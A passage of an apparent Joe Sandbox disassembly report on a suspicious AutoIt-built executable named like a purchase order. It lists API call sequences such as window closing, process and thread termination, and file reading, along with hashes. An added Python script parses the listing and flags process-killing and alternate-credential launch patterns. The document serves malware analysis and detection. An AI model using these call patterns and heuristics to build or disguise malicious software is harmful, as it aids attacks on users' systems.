                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 007edcf79b3fbfd40f08dd358027d63e451d7cafd86835c3d9e984c5138620bb
                        • Instruction ID: c2e2ecd2ab06b5cbc899356b3016512abdc98b07c6d4b1969ba47fcbf908cd52
                        • Opcode Fuzzy Hash: 007edcf79b3fbfd40f08dd358027d63e451d7cafd86835c3d9e984c5138620bb
                        • Instruction Fuzzy Hash: 44110576000149BFEF169F94EC88EEA7FADEF08350F048022FE094A160D7729D95DBA0
                        APIs
                        • GetDC.USER32(00000000), ref: 002EEFB6
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 002EEFC7
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002EEFCE
                        • ReleaseDC.USER32(00000000,00000000), ref: 002EEFD6
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002EEFED
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 002EEFFF
                          • Part of subcall function 002EA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,002EA79D,00000000,00000000,?,002EAB73), ref: 002EB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDevice$ExceptionRaiseRelease
                        • String ID:
                        • API String ID: 603618608-0
                        • Opcode ID: cf34a7c09be3b085e071159038b31b069e3e4a7dda514634db2fe644171ab4aa
                        • Instruction ID: 19b84f02dfa2fbfa8bb70fbc9e9f41edb50de3a6e6f0813fa81d6f41cc94f492
                        • Opcode Fuzzy Hash: cf34a7c09be3b085e071159038b31b069e3e4a7dda514634db2fe644171ab4aa
                        • Instruction Fuzzy Hash: 9A018475A40345BFEF109BA6AC45B5EBFB8EB48751F004066FA08AB290D6709C10CF61
                        APIs
                        • __init_pointers.LIBCMT ref: 002D87D7
                          • Part of subcall function 002D1E5A: __initp_misc_winsig.LIBCMT ref: 002D1E7E
                          • Part of subcall function 002D1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002D8BE1
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002D8BF5
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002D8C08
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002D8C1B
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002D8C2E
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002D8C41
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002D8C54
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002D8C67
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002D8C7A
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002D8C8D
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002D8CA0
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002D8CB3
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002D8CC6
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002D8CD9
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002D8CEC
                          • Part of subcall function 002D1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002D8CFF
                        • __mtinitlocks.LIBCMT ref: 002D87DC
                          • Part of subcall function 002D8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0036AC68,00000FA0,?,?,002D87E1,002D6AFA,003667D8,00000014), ref: 002D8AD1
                        • __mtterm.LIBCMT ref: 002D87E5
                          • Part of subcall function 002D884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002D87EA,002D6AFA,003667D8,00000014), ref: 002D89CF
                          • Part of subcall function 002D884D: _free.LIBCMT ref: 002D89D6
                          • Part of subcall function 002D884D: DeleteCriticalSection.KERNEL32(0036AC68,?,?,002D87EA,002D6AFA,003667D8,00000014), ref: 002D89F8
                        • __calloc_crt.LIBCMT ref: 002D880A
                        • GetCurrentThreadId.KERNEL32 ref: 002D8833
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 2942034483-0
                        • Opcode ID: a872313bf6eea9151d3252c22cb0dfb3c61ad5efb93445ddd4bf58c107ff68dd
                        • Instruction ID: fc5d44a7ea1d50b687a7c2c9ebf7c4694849fcfef3bda4baa3502141f252c66e
                        • Opcode Fuzzy Hash: a872313bf6eea9151d3252c22cb0dfb3c61ad5efb93445ddd4bf58c107ff68dd
                        • Instruction Fuzzy Hash: 00F0B4335397125AF2657B3C7C07A4A2AD58F01730F604A2BF460D63D2FF508C715951
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 1423608774-0
                        • Opcode ID: 6f4ceab3ac7412d5ad885f184ff3c28e0883e93fb7d644a0109a81e297b8d81d
                        • Instruction ID: 3668ce5c00a7fa3d671671223868487f3c33ab1123b05fd0e3d635fe5458e791
                        • Opcode Fuzzy Hash: 6f4ceab3ac7412d5ad885f184ff3c28e0883e93fb7d644a0109a81e297b8d81d
                        • Instruction Fuzzy Hash: A001D172501216ABD7162F64FC88EFBF76AFF89342F000579F607D20A0CB60A810CB51
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002B1898
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 002B18A0
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002B18AB
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002B18B6
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 002B18BE
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 002B18C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: 068b53c5dd4bc72a2ad2f0f729d9e1463383b1ede21f7ebc722c9cb82228111f
                        • Instruction ID: ae0015d2b6fc14dd1b6585287bb2eed650c84ffaddfb1207eea58d700c4c1584
                        • Opcode Fuzzy Hash: 068b53c5dd4bc72a2ad2f0f729d9e1463383b1ede21f7ebc722c9cb82228111f
                        • Instruction Fuzzy Hash: CB0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002F8504
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002F851A
                        • GetWindowThreadProcessId.USER32(?,?), ref: 002F8529
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8538
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8542
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002F8549
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: 51973704e1349a1f8545527a207771962f2b1eae82b29378e9a0de1020ddc3ac
                        • Instruction ID: e22130976064d501bf043c77cf44f10d6113f940a3c0bc9a02d58b4e2a2cacfb
                        • Opcode Fuzzy Hash: 51973704e1349a1f8545527a207771962f2b1eae82b29378e9a0de1020ddc3ac
                        • Instruction Fuzzy Hash: 1FF0BE32600158BBE7221B62AD4EEEF7E7CDFC6B11F000118FA01E1050EBA06A01C6B4
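                        Two of the entries above are the ones an analyst would grep for first in a listing like this: the function ending at 002F8549 (PostMessageW and SendMessageTimeoutW with message 0x10, which is WM_CLOSE, then GetWindowThreadProcessId, OpenProcess with access mask 0x1F0FFF, which is PROCESS_ALL_ACCESS, and TerminateProcess: ask a window to close, then kill its owning process), and the earlier one at 002EBCD9..002EBD3D (OpenProcessToken, CreateEnvironmentBlock, CreateProcessWithLogonW: start a process under other credentials). The Python below is an added example and not part of the Joe Sandbox report or its IDA plugin output. It parses the `• Name.MODULE(args), ref: ADDR` bullets in the textual form shown on this page (including the "Part of subcall function" variant), replaces the numeric arguments it recognises with their Windows SDK names, and flags ordered call sequences. The sample text is copied from the two entries named above with the trailing stack-residue arguments trimmed; the constant table is taken from the SDK headers, and the sequence rules are the editor's own triage heuristics, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of an "APIs" list, in the three shapes seen on this page:
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 002F8538
#   • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
#   • _memmove.LIBCMT ref: 002BC419
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:@?$]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]         # arguments exactly as printed ("?" = not resolved)
    ref: int                # call-site address
    subcall: Optional[int]  # callee address for "Part of subcall function" entries

def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the API bullets in listing order; headers like 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                 int(m.group("ref"), 16), sub))
    return calls

def _as_int(raw: str) -> Optional[int]:
    """Arguments are printed as hex ('-C0000018' is negative); '?' or strings such as
    'kernel32.dll' are not numbers and come back as None."""
    try:
        return int(raw, 16)
    except ValueError:
        return None

# (API, zero-based argument index) -> {value: SDK symbol}; values from the Windows SDK.
WIN32_CONSTANTS = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("PostMessageW", 1): {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND"},
    ("SendMessageTimeoutW", 1): {0x0010: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x0002: "SMTO_ABORTIFHUNG"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
    ("MapVirtualKeyW", 0): {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"},
}

def describe(call: ApiCall) -> str:
    """Render a call with recognised numeric arguments replaced by their SDK names."""
    shown = []
    for i, raw in enumerate(call.args):
        shown.append(WIN32_CONSTANTS.get((call.name, i), {}).get(_as_int(raw), raw))
    return f"{call.name}.{call.module}({', '.join(shown)}) @ {call.ref:08X}"

# Ordered call sequences worth a second look (editor's heuristics, not Joe Sandbox
# signatures). Calls must appear in this order among the function's own calls
# (subcall entries are ignored) but need not be adjacent.
SEQUENCE_RULES = {
    "terminates another process by window handle":
        ["GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"],
    "creates a process under alternate credentials":
        ["OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"],
    "kills a thread instead of signalling it": ["TerminateThread"],
}

def matched_rules(calls: List[ApiCall]) -> List[str]:
    hits = []
    for label, seq in SEQUENCE_RULES.items():
        want = iter(seq)
        pending = next(want)
        for c in calls:
            if c.subcall is None and c.name == pending:
                pending = next(want, None)
                if pending is None:
                    hits.append(label)
                    break
    return hits

# Constructed input: the two entries from the listing above, argument tails trimmed.
SAMPLE_KILL = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002F8504
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002F851A
• GetWindowThreadProcessId.USER32(?,?), ref: 002F8529
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 002F8538
• TerminateProcess.KERNEL32(00000000,00000000), ref: 002F8542
• CloseHandle.KERNEL32(00000000), ref: 002F8549
"""
SAMPLE_RUNAS = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002EBCD9
• OpenProcessToken.ADVAPI32(00000000), ref: 002EBCE0
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002EBCEF
• CloseHandle.KERNEL32(00000004), ref: 002EBCFA
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002EBD29
• DestroyEnvironmentBlock.USERENV(00000000), ref: 002EBD3D
"""

if __name__ == "__main__":
    for block in (SAMPLE_KILL, SAMPLE_RUNAS):
        calls = parse_api_lines(block)
        print("\n".join(describe(c) for c in calls), "\nflags:", matched_rules(calls))
```

                        Subcall entries are parsed but deliberately excluded from sequence matching: a "Part of subcall function" bullet describes what a callee does, and counting it would make every caller of a helper inherit the helper's flag. Rules are ordered subsequences rather than exact adjacency because the listing interleaves unrelated calls (CloseHandle, SendMessageTimeoutW) with the ones that matter.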
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 002FA330
                        • EnterCriticalSection.KERNEL32(?,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA341
                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA34E
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA35B
                          • Part of subcall function 002F9CCE: CloseHandle.KERNEL32(?,?,002FA368,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002F9CD8
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002FA36E
                        • LeaveCriticalSection.KERNEL32(?,?,?,?,003266D3,?,?,?,?,?,002BE681), ref: 002FA375
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: ff46129d613f583a2402e06c1cecd2499e03974b9cc9a0882baa126c7500751e
                        • Instruction ID: 8d14fa26152f3b02b170de1df956e13c9668372b733950b68bdfc02e6c139353
                        • Opcode Fuzzy Hash: ff46129d613f583a2402e06c1cecd2499e03974b9cc9a0882baa126c7500751e
                        • Instruction Fuzzy Hash: 60F05E72545216ABD3122F64FD88EEBBB7EEF89312F000921F602E10A1CBB59851DB51
                        APIs
                        • _memmove.LIBCMT ref: 002BC419
                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,002F6653,?,?,00000000), ref: 002BC495
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FileRead_memmove
                        • String ID: Sf/
                        • API String ID: 1325644223-164477059
                        • Opcode ID: e66136e04ef66eceb8d5c18f14448af64fcec6d82f6b73504af54d34aa5ae0d1
                        • Instruction ID: 14bb8cae8a979380c6ab53d05736d5d94312a2c2d36eaf4efa08a4e513637410
                        • Opcode Fuzzy Hash: e66136e04ef66eceb8d5c18f14448af64fcec6d82f6b73504af54d34aa5ae0d1
                        • Instruction Fuzzy Hash: 78A1EF70A14619EBDB01CF65D880BA9FBB4FF05340F24C195E869DB291D771EA60CBA1
                        APIs
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 002BBBD9: _memmove.LIBCMT ref: 002BBC33
                        • __swprintf.LIBCMT ref: 002CD98F
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002CD832
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: 88c40ccf285ba9f8bb5e8af51ef4ec2d9c63981e62751ee9860f0483f6aa92b9
                        • Instruction ID: 357830b8cfff4f9c23550280b49f27cec61bc64b1c08551c0736349e6bbc2e08
                        • Opcode Fuzzy Hash: 88c40ccf285ba9f8bb5e8af51ef4ec2d9c63981e62751ee9860f0483f6aa92b9
                        • Instruction Fuzzy Hash: 3F918B31128311AFC715EF24D881DAAB7A8EF85740F014A6EF4869B2A1DB30ED25CF52
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0030B4A8
                        • CharUpperBuffW.USER32(?,?), ref: 0030B5B7
                        • VariantClear.OLEAUT32(?), ref: 0030B73A
                          • Part of subcall function 002FA6F6: VariantInit.OLEAUT32(00000000), ref: 002FA736
                          • Part of subcall function 002FA6F6: VariantCopy.OLEAUT32(?,?), ref: 002FA73F
                          • Part of subcall function 002FA6F6: VariantClear.OLEAUT32(?), ref: 002FA74B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: f2ac376bc0f32fdcfd3f26b4bd3bd05d13390109ed1cd40bb10480087a0b4b96
                        • Instruction ID: def3e2b388f6fb0450ceed48cd5d28b91194b7be7a645a3de5361ddaa1cb8ca9
                        • Opcode Fuzzy Hash: f2ac376bc0f32fdcfd3f26b4bd3bd05d13390109ed1cd40bb10480087a0b4b96
                        • Instruction Fuzzy Hash: C5919D706183059FCB11DF24C890A9ABBF8EF89740F14486DF88A9B391DB31E945CF52
                        APIs
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • _memset.LIBCMT ref: 002F5E56
                        • GetMenuItemInfoW.USER32(?), ref: 002F5E85
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002F5F31
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002F5F5B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: a44f5d55e2945a7a638d11747e9a9d0ef4bc3dc7d3dfc20e98095e86899ca1cd
                        • Instruction ID: 963654957847a4c0ebc601b1e10ac9266dfed5840c79760f3e29f7655972d837
                        • Opcode Fuzzy Hash: a44f5d55e2945a7a638d11747e9a9d0ef4bc3dc7d3dfc20e98095e86899ca1cd
                        • Instruction Fuzzy Hash: 6651033253472A9AD3259F28C8846BBF7E8AF46390F080639FB95D31D1D770CD248B92
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002F10B8
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002F10EE
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002F10FF
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002F1181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 322aa4904cccae327c2ac8e66196f26ce8582b0a52a5925095c80630cb6e559e
                        • Instruction ID: 71d071db012b5300d229a4b142beb6d3ace755a8a476290859afa03d32194858
                        • Opcode Fuzzy Hash: 322aa4904cccae327c2ac8e66196f26ce8582b0a52a5925095c80630cb6e559e
                        • Instruction Fuzzy Hash: 5E415B71610209EFDB05CF54C884AABBBA9EF44390F5480B9EF09DF249D7B1D964CBA0
                        APIs
                        • _memset.LIBCMT ref: 002F5A93
                        • GetMenuItemInfoW.USER32 ref: 002F5AAF
                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002F5AF5
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003718F0,00000000), ref: 002F5B3E
                        Strings
                        Memory Dump Source
